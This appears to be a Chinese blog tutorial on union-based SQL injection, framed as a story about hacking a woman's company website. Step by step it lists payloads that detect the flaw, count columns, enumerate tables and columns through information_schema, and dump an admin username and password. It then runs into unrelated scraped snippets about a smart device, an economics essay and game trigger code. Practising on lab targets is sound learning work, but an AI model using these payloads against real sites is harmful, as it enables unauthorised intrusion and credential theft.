tips:
通過sql注入拿到管理員密碼!
尤里正在追女神小芳,在得知小芳開了一家公司後,尤里通過whois查詢發現了小芳公司**
學過一點黑客技術的他,想在女神面前炫炫技。於是他開啟了傳送門(小芳公司**).
第一步,判斷是否存在sql注入漏洞
在**後構造?id=1 and 1=1 ,然後回車
頁面返回正常
再次構造 ?id=1 and 1=2 然後回車
這裡頁面返回異常,初步判斷這裡可能存在乙個sql注入漏洞
第二步:判斷字段數
構造 ?id=1 and 1=1 order by 1 ,然後回車
頁面正常
構造 ?id=1 and 1=1 order by 2 ,然後回車
頁面返回正常
構造 ?id=1 and 1=1 order by 3 ,然後回車
頁面返回異常,判斷欄位數為2
第三步:判斷回顯點
構造 ?id=1 and 1=2 union select 1,2 然後回車
可以看到圖中頁面紅框處顯示數字2,說明我們可以在數字 2 處顯示我們想要的內容
1、查詢當前資料庫名
構造 ?id=1 and 1=2 union select 1,database() 回車
可以看到資料庫名為 maoshe
2、查詢當前資料庫版本
構造 ?id=1 and 1=2 union select 1,version() 回車
3、查詢當前資料庫表名
構造 ?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1 回車
絕大多數情況下,管理員的賬號密碼都在admin表裡
嘗試後發現還有3個表,分別是
dirs - - limit 1,1
news - - limit 2,1
xss - - limit 3,1
4、查詢欄位名
構造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=『admin』 limit 0,1 回車
嘗試後查出admin表裡有3個字段,分別是
id - - limit 0,1
username - - limit 1,1
password - - limit 2,1
5、查詢字段內容
構造 ?id=1 and 1=2 union select 1,username from admin limit 0,1 回車
構造 ?id=1 and 1=2 union select 1,password from admin limit 0,1 回車
這樣我們就得到了管理員賬號admin和密碼hellohack
除此之外我還檢視了其他表的內容
dirs只有乙個欄位paths,無內容
news有id,content兩個欄位id=1,content欄位內容是正常網頁的內容
xss有id,user,pass三個字段,無內容
本部落格參考並新增自己探索,有興趣的可以前往原站學習。
曾經的小芳,如今的小方
曾經的小芳,如今的小方 村里有個姑娘叫小芳 長得好看又善良 一雙美麗的大眼睛 辮子粗又長 這首歌是否勾起你深埋心底的記憶,是否讓你想起曾經的那個小芳。她溫婉可人,她通情達理,她悉心照料事無鉅細,她呵護備至幾近全能。今天的小方也是如此。有客來訪,你或事出在外或家務纏身,它都可以輕聲細語提醒,又不致錯失...
亞洲的復仇(下)
儲蓄過剩還有另乙個方面的影響,並與隨後一次金融衝擊有關 2000年網際網路泡沫的破滅。後果之一,是大部分高收入國家的企業界積累了大量財務盈餘。換句話說,公司的留存收益已超過其投資。非金融企業成為資金提供者,而不是從銀行和其它資本 商處貸款。一 批重要國家擁有大量儲蓄盈餘,與此同時,非金融企業的資本需...
孫權的復仇技能實現
死亡單位 是孫權 的 即是有復仇技能的孫權死亡 function trig multiboardrevivetimer u conditions takes nothing returns boolean if not getunittypeid getdyingunit u00o then ret...